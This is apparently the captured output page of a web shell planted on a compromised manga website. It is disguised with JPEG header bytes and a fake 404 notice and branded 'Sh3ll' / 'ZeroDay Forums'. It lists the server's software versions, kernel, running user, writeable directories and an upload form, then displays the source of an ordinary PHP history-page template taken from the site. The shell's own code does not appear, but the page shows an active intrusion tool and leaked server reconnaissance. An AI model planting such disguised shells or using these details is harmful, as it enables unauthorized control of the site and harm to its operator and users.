ÿØÿàJFIFÿÛ„ ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/okanime.top/code/manga/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/okanime.top/code/manga/history_tpl_backup.php
<div class="container follow_manga">
    <nav aria-label="breadcrumb">
        <ol class="breadcrumb">
            <li class="breadcrumb-item"><a href="/"><i class="fa fa-home"></i></a></li>
            <li class="breadcrumb-item"><a href="/genres/">All manga</a></li>
            <li class="breadcrumb-item">History</li>
        </ol>
    </nav>
    <div class="row">
        <div class="col-md-8">
            <ul class="nav nav-tabs">
                <li class="nav-item">
                    <a class="nav-link <?php if($type=='list'){echo 'active';}?>" href="/history/">All history</a>
                </li>
                <li class="nav-item">
                    <a class="nav-link <?php if($type=='account'){echo 'active';}?>" href="/history/account/">By account</a>
                </li>
            </ul>

            <?php
            if(!empty($list)){
                ?>
                <div class="row mt-2">
                    <div class="clear-all-history"><a href="javascript:void(0);" class="delete-all-history"><i class="fas fa-trash-alt"></i> Clear all history</a></div>
                    <?php
                    if($type=='list'){
                        echo $list;
                    }
                    if($type=='account'){
                        if(!empty($list_account)) {
                            echo $list_account;
                        }else{
                            echo '<div class="alert alert-warning alert-dismissible fade show" role="alert">
                        You don\'t have any reading manga history in your account.<br/>
                        You should <a href="/login.html">Sign in</a> to access your history mangas anywhere.
                        <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>
                    </div>';
                        }
                    }
                    ?>
                    <nav aria-label="Page navigation">
                        <ul class="pagination justify-content-center mt-2">
                            <?php echo $nav;?>
                        </ul>
                    </nav>
                </div>
            <?php }else{ ?>
                <div class="row mt-2">
                    <div class="alert alert-warning alert-dismissible fade show" role="alert">
                        You don't have any reading manga history<br/>
                        You should <a href="/login.html">Sign in</a> to access your history mangas anywhere.
                        <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>
                    </div>
                </div>
            <?php } ?>
        </div>
        <div class="col-md-4">
            <?php
            $txt_history = follow_manga(5);
            if(!empty($txt_history)){
                ?>
                <div class="card">
                    <div class="card-header">Follow
                        <div class="card-tools"><a href="/follow/" class="text-info"><i style="font-size: 12px">View all</i></a></div>
                    </div>
                    <div class="card-body darkBox">
                        <ul class="list-unstyled">
                            <?php echo $txt_history;?>
                        </ul>
                    </div>
                </div>
            <?php } ?>
            <ul class="nav nav-tabs <?php if(!empty($txt_history) or !empty($txt_follow)){echo'mt-2';}?>" id="top_manga" role="tablist">
                <li class="nav-item">
                    <a class="nav-link active text-info" href="javascript:void(0);" data-bs-toggle="tab" data-bs-target="#topmonth-tab-pane">Top month</a>
                </li>
                <li class="nav-item">
                    <a class="nav-link text-info" href="javascript:void(0);" data-bs-toggle="tab" data-bs-target="#topweek-tab-pane">Top week</a>
                </li>
                <li class="nav-item">
                    <a class="nav-link text-info" data-bs-toggle="tab" data-bs-target="#topday-tab-pane" href="javascript:void(0);">Top day</a>
                </li>
                <li class="nav-item dropdown">
                    <a class="nav-link dropdown-toggle" data-bs-toggle="dropdown" href="/search/top-manga/" role="button" aria-expanded="false">Top all</a>
                    <ul class="dropdown-menu">
                        <li><a class="dropdown-item" href="/search/top-month/">Top month</a></li>
                        <li><a class="dropdown-item" href="/search/top-week/">Top week</a></li>
                        <li><a class="dropdown-item" href="/search/top-day/">Top day</a></li>
                    </ul>
                </li>
            </ul>
            <div class="tab-content box-tab" id="content_top_manga">
                <div class="tab-pane fade show active" id="topmonth-tab-pane">
                    <ul class="list-group"><?php echo top_manga_month();?></ul>
                </div>
                <div class="tab-pane fade" id="topweek-tab-pane">
                    <ul class="list-group"><?php echo top_manga_week();?></ul>
                </div>
                <div class="tab-pane fade" id="topday-tab-pane">
                    <ul class="list-group"><?php echo top_manga_date();?></ul>
                </div>
            </div>
        </div>
    </div>
</div>

ZeroDay Forums Mini